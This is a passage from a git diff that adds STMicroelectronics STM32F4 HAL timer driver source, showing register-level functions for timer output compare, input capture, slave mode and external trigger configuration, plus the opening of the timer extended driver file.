Structure->Prescaler; + + if (IS_TIM_REPETITION_COUNTER_INSTANCE(TIMx)) + { + /* Set the Repetition Counter value */ + TIMx->RCR = Structure->RepetitionCounter; + } + + /* Generate an update event to reload the Prescaler + and the repetition counter (only for advanced timer) value immediately */ + TIMx->EGR = TIM_EGR_UG; +} + +/** + * @brief Timer Output Compare 1 configuration + * @param TIMx to select the TIM peripheral + * @param OC_Config The output configuration structure + * @retval None + */ +static void TIM_OC1_SetConfig(TIM_TypeDef *TIMx, TIM_OC_InitTypeDef *OC_Config) +{ + uint32_t tmpccmrx; + uint32_t tmpccer; + uint32_t tmpcr2; + + /* Disable the Channel 1: Reset the CC1E Bit */ + TIMx->CCER &= ~TIM_CCER_CC1E; + + /* Get the TIMx CCER register value */ + tmpccer = TIMx->CCER; + /* Get the TIMx CR2 register value */ + tmpcr2 = TIMx->CR2; + + /* Get the TIMx CCMR1 register value */ + tmpccmrx = TIMx->CCMR1; + + /* Reset the Output Compare Mode Bits */ + tmpccmrx &= ~TIM_CCMR1_OC1M; + tmpccmrx &= ~TIM_CCMR1_CC1S; + /* Select the Output Compare Mode */ + tmpccmrx |= OC_Config->OCMode; + + /* Reset the Output Polarity level */ + tmpccer &= ~TIM_CCER_CC1P; + /* Set the Output Compare Polarity */ + tmpccer |= OC_Config->OCPolarity; + + if (IS_TIM_CCXN_INSTANCE(TIMx, TIM_CHANNEL_1)) + { + /* Check parameters */ + assert_param(IS_TIM_OCN_POLARITY(OC_Config->OCNPolarity)); + + /* Reset the Output N Polarity level */ + tmpccer &= ~TIM_CCER_CC1NP; + /* Set the Output N Polarity */ + tmpccer |= OC_Config->OCNPolarity; + /* Reset the Output N State */ + tmpccer &= ~TIM_CCER_CC1NE; + } + + if (IS_TIM_BREAK_INSTANCE(TIMx)) + { + /* Check parameters */ + assert_param(IS_TIM_OCNIDLE_STATE(OC_Config->OCNIdleState)); + assert_param(IS_TIM_OCIDLE_STATE(OC_Config->OCIdleState)); + + /* Reset the Output Compare and Output Compare N IDLE State */ + tmpcr2 &= ~TIM_CR2_OIS1; + tmpcr2 &= ~TIM_CR2_OIS1N; + /* Set the Output Idle state */ + tmpcr2 |= OC_Config->OCIdleState; + /* Set the Output N Idle state */ + tmpcr2 |= OC_Config->OCNIdleState; + } + + /* Write to TIMx CR2 */ + TIMx->CR2 = tmpcr2; + + /* Write to TIMx CCMR1 */ + TIMx->CCMR1 = tmpccmrx; + + /* Set the Capture Compare Register value */ + TIMx->CCR1 = OC_Config->Pulse; + + /* Write to TIMx CCER */ + TIMx->CCER = tmpccer; +} + +/** + * @brief Timer Output Compare 2 configuration + * @param TIMx to select the TIM peripheral + * @param OC_Config The output configuration structure + * @retval None + */ +void TIM_OC2_SetConfig(TIM_TypeDef *TIMx, TIM_OC_InitTypeDef *OC_Config) +{ + uint32_t tmpccmrx; + uint32_t tmpccer; + uint32_t tmpcr2; + + /* Disable the Channel 2: Reset the CC2E Bit */ + TIMx->CCER &= ~TIM_CCER_CC2E; + + /* Get the TIMx CCER register value */ + tmpccer = TIMx->CCER; + /* Get the TIMx CR2 register value */ + tmpcr2 = TIMx->CR2; + + /* Get the TIMx CCMR1 register value */ + tmpccmrx = TIMx->CCMR1; + + /* Reset the Output Compare mode and Capture/Compare selection Bits */ + tmpccmrx &= ~TIM_CCMR1_OC2M; + tmpccmrx &= ~TIM_CCMR1_CC2S; + + /* Select the Output Compare Mode */ + tmpccmrx |= (OC_Config->OCMode << 8U); + + /* Reset the Output Polarity level */ + tmpccer &= ~TIM_CCER_CC2P; + /* Set the Output Compare Polarity */ + tmpccer |= (OC_Config->OCPolarity << 4U); + + if (IS_TIM_CCXN_INSTANCE(TIMx, TIM_CHANNEL_2)) + { + assert_param(IS_TIM_OCN_POLARITY(OC_Config->OCNPolarity)); + + /* Reset the Output N Polarity level */ + tmpccer &= ~TIM_CCER_CC2NP; + /* Set the Output N Polarity */ + tmpccer |= (OC_Config->OCNPolarity << 4U); + /* Reset the Output N State */ + tmpccer &= ~TIM_CCER_CC2NE; + + } + + if (IS_TIM_BREAK_INSTANCE(TIMx)) + { + /* Check parameters */ + assert_param(IS_TIM_OCNIDLE_STATE(OC_Config->OCNIdleState)); + assert_param(IS_TIM_OCIDLE_STATE(OC_Config->OCIdleState)); + + /* Reset the Output Compare and Output Compare N IDLE State */ + tmpcr2 &= ~TIM_CR2_OIS2; + tmpcr2 &= ~TIM_CR2_OIS2N; + /* Set the Output Idle state */ + tmpcr2 |= (OC_Config->OCIdleState << 2U); + /* Set the Output N Idle state */ + tmpcr2 |= (OC_Config->OCNIdleState << 2U); + } + + /* Write to TIMx CR2 */ + TIMx->CR2 = tmpcr2; + + /* Write to TIMx CCMR1 */ + TIMx->CCMR1 = tmpccmrx; + + /* Set the Capture Compare Register value */ + TIMx->CCR2 = OC_Config->Pulse; + + /* Write to TIMx CCER */ + TIMx->CCER = tmpccer; +} + +/** + * @brief Timer Output Compare 3 configuration + * @param TIMx to select the TIM peripheral + * @param OC_Config The output configuration structure + * @retval None + */ +static void TIM_OC3_SetConfig(TIM_TypeDef *TIMx, TIM_OC_InitTypeDef *OC_Config) +{ + uint32_t tmpccmrx; + uint32_t tmpccer; + uint32_t tmpcr2; + + /* Disable the Channel 3: Reset the CC2E Bit */ + TIMx->CCER &= ~TIM_CCER_CC3E; + + /* Get the TIMx CCER register value */ + tmpccer = TIMx->CCER; + /* Get the TIMx CR2 register value */ + tmpcr2 = TIMx->CR2; + + /* Get the TIMx CCMR2 register value */ + tmpccmrx = TIMx->CCMR2; + + /* Reset the Output Compare mode and Capture/Compare selection Bits */ + tmpccmrx &= ~TIM_CCMR2_OC3M; + tmpccmrx &= ~TIM_CCMR2_CC3S; + /* Select the Output Compare Mode */ + tmpccmrx |= OC_Config->OCMode; + + /* Reset the Output Polarity level */ + tmpccer &= ~TIM_CCER_CC3P; + /* Set the Output Compare Polarity */ + tmpccer |= (OC_Config->OCPolarity << 8U); + + if (IS_TIM_CCXN_INSTANCE(TIMx, TIM_CHANNEL_3)) + { + assert_param(IS_TIM_OCN_POLARITY(OC_Config->OCNPolarity)); + + /* Reset the Output N Polarity level */ + tmpccer &= ~TIM_CCER_CC3NP; + /* Set the Output N Polarity */ + tmpccer |= (OC_Config->OCNPolarity << 8U); + /* Reset the Output N State */ + tmpccer &= ~TIM_CCER_CC3NE; + } + + if (IS_TIM_BREAK_INSTANCE(TIMx)) + { + /* Check parameters */ + assert_param(IS_TIM_OCNIDLE_STATE(OC_Config->OCNIdleState)); + assert_param(IS_TIM_OCIDLE_STATE(OC_Config->OCIdleState)); + + /* Reset the Output Compare and Output Compare N IDLE State */ + tmpcr2 &= ~TIM_CR2_OIS3; + tmpcr2 &= ~TIM_CR2_OIS3N; + /* Set the Output Idle state */ + tmpcr2 |= (OC_Config->OCIdleState << 4U); + /* Set the Output N Idle state */ + tmpcr2 |= (OC_Config->OCNIdleState << 4U); + } + + /* Write to TIMx CR2 */ + TIMx->CR2 = tmpcr2; + + /* Write to TIMx CCMR2 */ + TIMx->CCMR2 = tmpccmrx; + + /* Set the Capture Compare Register value */ + TIMx->CCR3 = OC_Config->Pulse; + + /* Write to TIMx CCER */ + TIMx->CCER = tmpccer; +} + +/** + * @brief Timer Output Compare 4 configuration + * @param TIMx to select the TIM peripheral + * @param OC_Config The output configuration structure + * @retval None + */ +static void TIM_OC4_SetConfig(TIM_TypeDef *TIMx, TIM_OC_InitTypeDef *OC_Config) +{ + uint32_t tmpccmrx; + uint32_t tmpccer; + uint32_t tmpcr2; + + /* Disable the Channel 4: Reset the CC4E Bit */ + TIMx->CCER &= ~TIM_CCER_CC4E; + + /* Get the TIMx CCER register value */ + tmpccer = TIMx->CCER; + /* Get the TIMx CR2 register value */ + tmpcr2 = TIMx->CR2; + + /* Get the TIMx CCMR2 register value */ + tmpccmrx = TIMx->CCMR2; + + /* Reset the Output Compare mode and Capture/Compare selection Bits */ + tmpccmrx &= ~TIM_CCMR2_OC4M; + tmpccmrx &= ~TIM_CCMR2_CC4S; + + /* Select the Output Compare Mode */ + tmpccmrx |= (OC_Config->OCMode << 8U); + + /* Reset the Output Polarity level */ + tmpccer &= ~TIM_CCER_CC4P; + /* Set the Output Compare Polarity */ + tmpccer |= (OC_Config->OCPolarity << 12U); + + if (IS_TIM_BREAK_INSTANCE(TIMx)) + { + /* Check parameters */ + assert_param(IS_TIM_OCIDLE_STATE(OC_Config->OCIdleState)); + + /* Reset the Output Compare IDLE State */ + tmpcr2 &= ~TIM_CR2_OIS4; + + /* Set the Output Idle state */ + tmpcr2 |= (OC_Config->OCIdleState << 6U); + } + + /* Write to TIMx CR2 */ + TIMx->CR2 = tmpcr2; + + /* Write to TIMx CCMR2 */ + TIMx->CCMR2 = tmpccmrx; + + /* Set the Capture Compare Register value */ + TIMx->CCR4 = OC_Config->Pulse; + + /* Write to TIMx CCER */ + TIMx->CCER = tmpccer; +} + +/** + * @brief Slave Timer configuration function + * @param htim TIM handle + * @param sSlaveConfig Slave timer configuration + * @retval None + */ +static HAL_StatusTypeDef TIM_SlaveTimer_SetConfig(TIM_HandleTypeDef *htim, + TIM_SlaveConfigTypeDef *sSlaveConfig) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpsmcr; + uint32_t tmpccmr1; + uint32_t tmpccer; + + /* Get the TIMx SMCR register value */ + tmpsmcr = htim->Instance->SMCR; + + /* Reset the Trigger Selection Bits */ + tmpsmcr &= ~TIM_SMCR_TS; + /* Set the Input Trigger source */ + tmpsmcr |= sSlaveConfig->InputTrigger; + + /* Reset the slave mode Bits */ + tmpsmcr &= ~TIM_SMCR_SMS; + /* Set the slave mode */ + tmpsmcr |= sSlaveConfig->SlaveMode; + + /* Write to TIMx SMCR */ + htim->Instance->SMCR = tmpsmcr; + + /* Configure the trigger prescaler, filter, and polarity */ + switch (sSlaveConfig->InputTrigger) + { + case TIM_TS_ETRF: + { + /* Check the parameters */ + assert_param(IS_TIM_CLOCKSOURCE_ETRMODE1_INSTANCE(htim->Instance)); + assert_param(IS_TIM_TRIGGERPRESCALER(sSlaveConfig->TriggerPrescaler)); + assert_param(IS_TIM_TRIGGERPOLARITY(sSlaveConfig->TriggerPolarity)); + assert_param(IS_TIM_TRIGGERFILTER(sSlaveConfig->TriggerFilter)); + /* Configure the ETR Trigger source */ + TIM_ETR_SetConfig(htim->Instance, + sSlaveConfig->TriggerPrescaler, + sSlaveConfig->TriggerPolarity, + sSlaveConfig->TriggerFilter); + break; + } + + case TIM_TS_TI1F_ED: + { + /* Check the parameters */ + assert_param(IS_TIM_CC1_INSTANCE(htim->Instance)); + assert_param(IS_TIM_TRIGGERFILTER(sSlaveConfig->TriggerFilter)); + + if (sSlaveConfig->SlaveMode == TIM_SLAVEMODE_GATED) + { + return HAL_ERROR; + } + + /* Disable the Channel 1: Reset the CC1E Bit */ + tmpccer = htim->Instance->CCER; + htim->Instance->CCER &= ~TIM_CCER_CC1E; + tmpccmr1 = htim->Instance->CCMR1; + + /* Set the filter */ + tmpccmr1 &= ~TIM_CCMR1_IC1F; + tmpccmr1 |= ((sSlaveConfig->TriggerFilter) << 4U); + + /* Write to TIMx CCMR1 and CCER registers */ + htim->Instance->CCMR1 = tmpccmr1; + htim->Instance->CCER = tmpccer; + break; + } + + case TIM_TS_TI1FP1: + { + /* Check the parameters */ + assert_param(IS_TIM_CC1_INSTANCE(htim->Instance)); + assert_param(IS_TIM_TRIGGERPOLARITY(sSlaveConfig->TriggerPolarity)); + assert_param(IS_TIM_TRIGGERFILTER(sSlaveConfig->TriggerFilter)); + + /* Configure TI1 Filter and Polarity */ + TIM_TI1_ConfigInputStage(htim->Instance, + sSlaveConfig->TriggerPolarity, + sSlaveConfig->TriggerFilter); + break; + } + + case TIM_TS_TI2FP2: + { + /* Check the parameters */ + assert_param(IS_TIM_CC2_INSTANCE(htim->Instance)); + assert_param(IS_TIM_TRIGGERPOLARITY(sSlaveConfig->TriggerPolarity)); + assert_param(IS_TIM_TRIGGERFILTER(sSlaveConfig->TriggerFilter)); + + /* Configure TI2 Filter and Polarity */ + TIM_TI2_ConfigInputStage(htim->Instance, + sSlaveConfig->TriggerPolarity, + sSlaveConfig->TriggerFilter); + break; + } + + case TIM_TS_ITR0: + case TIM_TS_ITR1: + case TIM_TS_ITR2: + case TIM_TS_ITR3: + { + /* Check the parameter */ + assert_param(IS_TIM_CC2_INSTANCE(htim->Instance)); + break; + } + + default: + status = HAL_ERROR; + break; + } + + return status; +} + +/** + * @brief Configure the TI1 as Input. + * @param TIMx to select the TIM peripheral. + * @param TIM_ICPolarity The Input Polarity. + * This parameter can be one of the following values: + * @arg TIM_ICPOLARITY_RISING + * @arg TIM_ICPOLARITY_FALLING + * @arg TIM_ICPOLARITY_BOTHEDGE + * @param TIM_ICSelection specifies the input to be used. + * This parameter can be one of the following values: + * @arg TIM_ICSELECTION_DIRECTTI: TIM Input 1 is selected to be connected to IC1. + * @arg TIM_ICSELECTION_INDIRECTTI: TIM Input 1 is selected to be connected to IC2. + * @arg TIM_ICSELECTION_TRC: TIM Input 1 is selected to be connected to TRC. + * @param TIM_ICFilter Specifies the Input Capture Filter. + * This parameter must be a value between 0x00 and 0x0F. + * @retval None + * @note TIM_ICFilter and TIM_ICPolarity are not used in INDIRECT mode as TI2FP1 + * (on channel2 path) is used as the input signal. Therefore CCMR1 must be + * protected against un-initialized filter and polarity values. + */ +void TIM_TI1_SetConfig(TIM_TypeDef *TIMx, uint32_t TIM_ICPolarity, uint32_t TIM_ICSelection, + uint32_t TIM_ICFilter) +{ + uint32_t tmpccmr1; + uint32_t tmpccer; + + /* Disable the Channel 1: Reset the CC1E Bit */ + TIMx->CCER &= ~TIM_CCER_CC1E; + tmpccmr1 = TIMx->CCMR1; + tmpccer = TIMx->CCER; + + /* Select the Input */ + if (IS_TIM_CC2_INSTANCE(TIMx) != RESET) + { + tmpccmr1 &= ~TIM_CCMR1_CC1S; + tmpccmr1 |= TIM_ICSelection; + } + else + { + tmpccmr1 |= TIM_CCMR1_CC1S_0; + } + + /* Set the filter */ + tmpccmr1 &= ~TIM_CCMR1_IC1F; + tmpccmr1 |= ((TIM_ICFilter << 4U) & TIM_CCMR1_IC1F); + + /* Select the Polarity and set the CC1E Bit */ + tmpccer &= ~(TIM_CCER_CC1P | TIM_CCER_CC1NP); + tmpccer |= (TIM_ICPolarity & (TIM_CCER_CC1P | TIM_CCER_CC1NP)); + + /* Write to TIMx CCMR1 and CCER registers */ + TIMx->CCMR1 = tmpccmr1; + TIMx->CCER = tmpccer; +} + +/** + * @brief Configure the Polarity and Filter for TI1. + * @param TIMx to select the TIM peripheral. + * @param TIM_ICPolarity The Input Polarity. + * This parameter can be one of the following values: + * @arg TIM_ICPOLARITY_RISING + * @arg TIM_ICPOLARITY_FALLING + * @arg TIM_ICPOLARITY_BOTHEDGE + * @param TIM_ICFilter Specifies the Input Capture Filter. + * This parameter must be a value between 0x00 and 0x0F. + * @retval None + */ +static void TIM_TI1_ConfigInputStage(TIM_TypeDef *TIMx, uint32_t TIM_ICPolarity, uint32_t TIM_ICFilter) +{ + uint32_t tmpccmr1; + uint32_t tmpccer; + + /* Disable the Channel 1: Reset the CC1E Bit */ + tmpccer = TIMx->CCER; + TIMx->CCER &= ~TIM_CCER_CC1E; + tmpccmr1 = TIMx->CCMR1; + + /* Set the filter */ + tmpccmr1 &= ~TIM_CCMR1_IC1F; + tmpccmr1 |= (TIM_ICFilter << 4U); + + /* Select the Polarity and set the CC1E Bit */ + tmpccer &= ~(TIM_CCER_CC1P | TIM_CCER_CC1NP); + tmpccer |= TIM_ICPolarity; + + /* Write to TIMx CCMR1 and CCER registers */ + TIMx->CCMR1 = tmpccmr1; + TIMx->CCER = tmpccer; +} + +/** + * @brief Configure the TI2 as Input. + * @param TIMx to select the TIM peripheral + * @param TIM_ICPolarity The Input Polarity. + * This parameter can be one of the following values: + * @arg TIM_ICPOLARITY_RISING + * @arg TIM_ICPOLARITY_FALLING + * @arg TIM_ICPOLARITY_BOTHEDGE + * @param TIM_ICSelection specifies the input to be used. + * This parameter can be one of the following values: + * @arg TIM_ICSELECTION_DIRECTTI: TIM Input 2 is selected to be connected to IC2. + * @arg TIM_ICSELECTION_INDIRECTTI: TIM Input 2 is selected to be connected to IC1. + * @arg TIM_ICSELECTION_TRC: TIM Input 2 is selected to be connected to TRC. + * @param TIM_ICFilter Specifies the Input Capture Filter. + * This parameter must be a value between 0x00 and 0x0F. + * @retval None + * @note TIM_ICFilter and TIM_ICPolarity are not used in INDIRECT mode as TI1FP2 + * (on channel1 path) is used as the input signal. Therefore CCMR1 must be + * protected against un-initialized filter and polarity values. + */ +static void TIM_TI2_SetConfig(TIM_TypeDef *TIMx, uint32_t TIM_ICPolarity, uint32_t TIM_ICSelection, + uint32_t TIM_ICFilter) +{ + uint32_t tmpccmr1; + uint32_t tmpccer; + + /* Disable the Channel 2: Reset the CC2E Bit */ + TIMx->CCER &= ~TIM_CCER_CC2E; + tmpccmr1 = TIMx->CCMR1; + tmpccer = TIMx->CCER; + + /* Select the Input */ + tmpccmr1 &= ~TIM_CCMR1_CC2S; + tmpccmr1 |= (TIM_ICSelection << 8U); + + /* Set the filter */ + tmpccmr1 &= ~TIM_CCMR1_IC2F; + tmpccmr1 |= ((TIM_ICFilter << 12U) & TIM_CCMR1_IC2F); + + /* Select the Polarity and set the CC2E Bit */ + tmpccer &= ~(TIM_CCER_CC2P | TIM_CCER_CC2NP); + tmpccer |= ((TIM_ICPolarity << 4U) & (TIM_CCER_CC2P | TIM_CCER_CC2NP)); + + /* Write to TIMx CCMR1 and CCER registers */ + TIMx->CCMR1 = tmpccmr1 ; + TIMx->CCER = tmpccer; +} + +/** + * @brief Configure the Polarity and Filter for TI2. + * @param TIMx to select the TIM peripheral. + * @param TIM_ICPolarity The Input Polarity. + * This parameter can be one of the following values: + * @arg TIM_ICPOLARITY_RISING + * @arg TIM_ICPOLARITY_FALLING + * @arg TIM_ICPOLARITY_BOTHEDGE + * @param TIM_ICFilter Specifies the Input Capture Filter. + * This parameter must be a value between 0x00 and 0x0F. + * @retval None + */ +static void TIM_TI2_ConfigInputStage(TIM_TypeDef *TIMx, uint32_t TIM_ICPolarity, uint32_t TIM_ICFilter) +{ + uint32_t tmpccmr1; + uint32_t tmpccer; + + /* Disable the Channel 2: Reset the CC2E Bit */ + TIMx->CCER &= ~TIM_CCER_CC2E; + tmpccmr1 = TIMx->CCMR1; + tmpccer = TIMx->CCER; + + /* Set the filter */ + tmpccmr1 &= ~TIM_CCMR1_IC2F; + tmpccmr1 |= (TIM_ICFilter << 12U); + + /* Select the Polarity and set the CC2E Bit */ + tmpccer &= ~(TIM_CCER_CC2P | TIM_CCER_CC2NP); + tmpccer |= (TIM_ICPolarity << 4U); + + /* Write to TIMx CCMR1 and CCER registers */ + TIMx->CCMR1 = tmpccmr1 ; + TIMx->CCER = tmpccer; +} + +/** + * @brief Configure the TI3 as Input. + * @param TIMx to select the TIM peripheral + * @param TIM_ICPolarity The Input Polarity. + * This parameter can be one of the following values: + * @arg TIM_ICPOLARITY_RISING + * @arg TIM_ICPOLARITY_FALLING + * @arg TIM_ICPOLARITY_BOTHEDGE + * @param TIM_ICSelection specifies the input to be used. + * This parameter can be one of the following values: + * @arg TIM_ICSELECTION_DIRECTTI: TIM Input 3 is selected to be connected to IC3. + * @arg TIM_ICSELECTION_INDIRECTTI: TIM Input 3 is selected to be connected to IC4. + * @arg TIM_ICSELECTION_TRC: TIM Input 3 is selected to be connected to TRC. + * @param TIM_ICFilter Specifies the Input Capture Filter. + * This parameter must be a value between 0x00 and 0x0F. + * @retval None + * @note TIM_ICFilter and TIM_ICPolarity are not used in INDIRECT mode as TI3FP4 + * (on channel1 path) is used as the input signal. Therefore CCMR2 must be + * protected against un-initialized filter and polarity values. + */ +static void TIM_TI3_SetConfig(TIM_TypeDef *TIMx, uint32_t TIM_ICPolarity, uint32_t TIM_ICSelection, + uint32_t TIM_ICFilter) +{ + uint32_t tmpccmr2; + uint32_t tmpccer; + + /* Disable the Channel 3: Reset the CC3E Bit */ + TIMx->CCER &= ~TIM_CCER_CC3E; + tmpccmr2 = TIMx->CCMR2; + tmpccer = TIMx->CCER; + + /* Select the Input */ + tmpccmr2 &= ~TIM_CCMR2_CC3S; + tmpccmr2 |= TIM_ICSelection; + + /* Set the filter */ + tmpccmr2 &= ~TIM_CCMR2_IC3F; + tmpccmr2 |= ((TIM_ICFilter << 4U) & TIM_CCMR2_IC3F); + + /* Select the Polarity and set the CC3E Bit */ + tmpccer &= ~(TIM_CCER_CC3P | TIM_CCER_CC3NP); + tmpccer |= ((TIM_ICPolarity << 8U) & (TIM_CCER_CC3P | TIM_CCER_CC3NP)); + + /* Write to TIMx CCMR2 and CCER registers */ + TIMx->CCMR2 = tmpccmr2; + TIMx->CCER = tmpccer; +} + +/** + * @brief Configure the TI4 as Input. + * @param TIMx to select the TIM peripheral + * @param TIM_ICPolarity The Input Polarity. + * This parameter can be one of the following values: + * @arg TIM_ICPOLARITY_RISING + * @arg TIM_ICPOLARITY_FALLING + * @arg TIM_ICPOLARITY_BOTHEDGE + * @param TIM_ICSelection specifies the input to be used. + * This parameter can be one of the following values: + * @arg TIM_ICSELECTION_DIRECTTI: TIM Input 4 is selected to be connected to IC4. + * @arg TIM_ICSELECTION_INDIRECTTI: TIM Input 4 is selected to be connected to IC3. + * @arg TIM_ICSELECTION_TRC: TIM Input 4 is selected to be connected to TRC. + * @param TIM_ICFilter Specifies the Input Capture Filter. + * This parameter must be a value between 0x00 and 0x0F. + * @note TIM_ICFilter and TIM_ICPolarity are not used in INDIRECT mode as TI4FP3 + * (on channel1 path) is used as the input signal. Therefore CCMR2 must be + * protected against un-initialized filter and polarity values. + * @retval None + */ +static void TIM_TI4_SetConfig(TIM_TypeDef *TIMx, uint32_t TIM_ICPolarity, uint32_t TIM_ICSelection, + uint32_t TIM_ICFilter) +{ + uint32_t tmpccmr2; + uint32_t tmpccer; + + /* Disable the Channel 4: Reset the CC4E Bit */ + TIMx->CCER &= ~TIM_CCER_CC4E; + tmpccmr2 = TIMx->CCMR2; + tmpccer = TIMx->CCER; + + /* Select the Input */ + tmpccmr2 &= ~TIM_CCMR2_CC4S; + tmpccmr2 |= (TIM_ICSelection << 8U); + + /* Set the filter */ + tmpccmr2 &= ~TIM_CCMR2_IC4F; + tmpccmr2 |= ((TIM_ICFilter << 12U) & TIM_CCMR2_IC4F); + + /* Select the Polarity and set the CC4E Bit */ + tmpccer &= ~(TIM_CCER_CC4P | TIM_CCER_CC4NP); + tmpccer |= ((TIM_ICPolarity << 12U) & (TIM_CCER_CC4P | TIM_CCER_CC4NP)); + + /* Write to TIMx CCMR2 and CCER registers */ + TIMx->CCMR2 = tmpccmr2; + TIMx->CCER = tmpccer ; +} + +/** + * @brief Selects the Input Trigger source + * @param TIMx to select the TIM peripheral + * @param InputTriggerSource The Input Trigger source. + * This parameter can be one of the following values: + * @arg TIM_TS_ITR0: Internal Trigger 0 + * @arg TIM_TS_ITR1: Internal Trigger 1 + * @arg TIM_TS_ITR2: Internal Trigger 2 + * @arg TIM_TS_ITR3: Internal Trigger 3 + * @arg TIM_TS_TI1F_ED: TI1 Edge Detector + * @arg TIM_TS_TI1FP1: Filtered Timer Input 1 + * @arg TIM_TS_TI2FP2: Filtered Timer Input 2 + * @arg TIM_TS_ETRF: External Trigger input + * @retval None + */ +static void TIM_ITRx_SetConfig(TIM_TypeDef *TIMx, uint32_t InputTriggerSource) +{ + uint32_t tmpsmcr; + + /* Get the TIMx SMCR register value */ + tmpsmcr = TIMx->SMCR; + /* Reset the TS Bits */ + tmpsmcr &= ~TIM_SMCR_TS; + /* Set the Input Trigger source and the slave mode*/ + tmpsmcr |= (InputTriggerSource | TIM_SLAVEMODE_EXTERNAL1); + /* Write to TIMx SMCR */ + TIMx->SMCR = tmpsmcr; +} +/** + * @brief Configures the TIMx External Trigger (ETR). + * @param TIMx to select the TIM peripheral + * @param TIM_ExtTRGPrescaler The external Trigger Prescaler. + * This parameter can be one of the following values: + * @arg TIM_ETRPRESCALER_DIV1: ETRP Prescaler OFF. + * @arg TIM_ETRPRESCALER_DIV2: ETRP frequency divided by 2. + * @arg TIM_ETRPRESCALER_DIV4: ETRP frequency divided by 4. + * @arg TIM_ETRPRESCALER_DIV8: ETRP frequency divided by 8. + * @param TIM_ExtTRGPolarity The external Trigger Polarity. + * This parameter can be one of the following values: + * @arg TIM_ETRPOLARITY_INVERTED: active low or falling edge active. + * @arg TIM_ETRPOLARITY_NONINVERTED: active high or rising edge active. + * @param ExtTRGFilter External Trigger Filter. + * This parameter must be a value between 0x00 and 0x0F + * @retval None + */ +void TIM_ETR_SetConfig(TIM_TypeDef *TIMx, uint32_t TIM_ExtTRGPrescaler, + uint32_t TIM_ExtTRGPolarity, uint32_t ExtTRGFilter) +{ + uint32_t tmpsmcr; + + tmpsmcr = TIMx->SMCR; + + /* Reset the ETR Bits */ + tmpsmcr &= ~(TIM_SMCR_ETF | TIM_SMCR_ETPS | TIM_SMCR_ECE | TIM_SMCR_ETP); + + /* Set the Prescaler, the Filter value and the Polarity */ + tmpsmcr |= (uint32_t)(TIM_ExtTRGPrescaler | (TIM_ExtTRGPolarity | (ExtTRGFilter << 8U))); + + /* Write to TIMx SMCR */ + TIMx->SMCR = tmpsmcr; +} + +/** + * @brief Enables or disables the TIM Capture Compare Channel x. + * @param TIMx to select the TIM peripheral + * @param Channel specifies the TIM Channel + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 + * @arg TIM_CHANNEL_2: TIM Channel 2 + * @arg TIM_CHANNEL_3: TIM Channel 3 + * @arg TIM_CHANNEL_4: TIM Channel 4 + * @param ChannelState specifies the TIM Channel CCxE bit new state. + * This parameter can be: TIM_CCx_ENABLE or TIM_CCx_DISABLE. + * @retval None + */ +void TIM_CCxChannelCmd(TIM_TypeDef *TIMx, uint32_t Channel, uint32_t ChannelState) +{ + uint32_t tmp; + + /* Check the parameters */ + assert_param(IS_TIM_CC1_INSTANCE(TIMx)); + assert_param(IS_TIM_CHANNELS(Channel)); + + tmp = TIM_CCER_CC1E << (Channel & 0x1FU); /* 0x1FU = 31 bits max shift */ + + /* Reset the CCxE Bit */ + TIMx->CCER &= ~tmp; + + /* Set or reset the CCxE Bit */ + TIMx->CCER |= (uint32_t)(ChannelState << (Channel & 0x1FU)); /* 0x1FU = 31 bits max shift */ +} + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) +/** + * @brief Reset interrupt callbacks to the legacy weak callbacks. + * @param htim pointer to a TIM_HandleTypeDef structure that contains + * the configuration information for TIM module. + * @retval None + */ +void TIM_ResetCallback(TIM_HandleTypeDef *htim) +{ + /* Reset the TIM callback to the legacy weak callbacks */ + htim->PeriodElapsedCallback = HAL_TIM_PeriodElapsedCallback; + htim->PeriodElapsedHalfCpltCallback = HAL_TIM_PeriodElapsedHalfCpltCallback; + htim->TriggerCallback = HAL_TIM_TriggerCallback; + htim->TriggerHalfCpltCallback = HAL_TIM_TriggerHalfCpltCallback; + htim->IC_CaptureCallback = HAL_TIM_IC_CaptureCallback; + htim->IC_CaptureHalfCpltCallback = HAL_TIM_IC_CaptureHalfCpltCallback; + htim->OC_DelayElapsedCallback = HAL_TIM_OC_DelayElapsedCallback; + htim->PWM_PulseFinishedCallback = HAL_TIM_PWM_PulseFinishedCallback; + htim->PWM_PulseFinishedHalfCpltCallback = HAL_TIM_PWM_PulseFinishedHalfCpltCallback; + htim->ErrorCallback = HAL_TIM_ErrorCallback; + htim->CommutationCallback = HAL_TIMEx_CommutCallback; + htim->CommutationHalfCpltCallback = HAL_TIMEx_CommutHalfCpltCallback; + htim->BreakCallback = HAL_TIMEx_BreakCallback; +} +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + +/** + * @} + */ + +#endif /* HAL_TIM_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_tim_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_tim_ex.c new file mode 100644 index 000000000..bba44f15c --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_tim_ex.c @@ -0,0 +1,2429 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_tim_ex.c + * @author MCD Application Team + * @brief TIM HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Timer Extended peripheral: + * + Time Hall Sensor Interface Initialization + * + Time Hall Sensor Interface Start + * + Time Complementary signal break and dead time configuration + * + Time Master and Slave synchronization configuration + * + Timer remapping capabilities configuration + @verbatim + ============================================================================== + ##### TIMER Extended features ##### + ============================================================================== + [..] + The Timer Extended features include: + (#) Complementary outputs with programmable dead-time for : + (++) Output Compare + (++) PWM generation (Edge and Center-aligned Mode) + (++) One-pulse mode output + (#) Synchronization circuit to control the timer with external signals and to + interconnect several timers together. + (#) Break input to put the timer output signals in reset state or in a known state. + (#) Supports incremental (quadrature) encoder and hall-sensor circuitry for + positioning purposes + + ##### How to use this driver ##### + ============================================================================== + [..] + (#) Initialize the TIM low level resources by implementing the following functions + depending on the selected feature: + (++) Hall Sensor output : HAL_TIMEx_HallSensor_MspInit() + + (#) Initialize the TIM low level resources : + (##) Enable the TIM interface clock using __HAL_RCC_TIMx_CLK_ENABLE(); + (##) TIM pins configuration + (+++) Enable the clock for the TIM GPIOs using the following function: + __HAL_RCC_GPIOx_CLK_ENABLE(); + (+++) Configure these TIM pins in Alternate function mode using 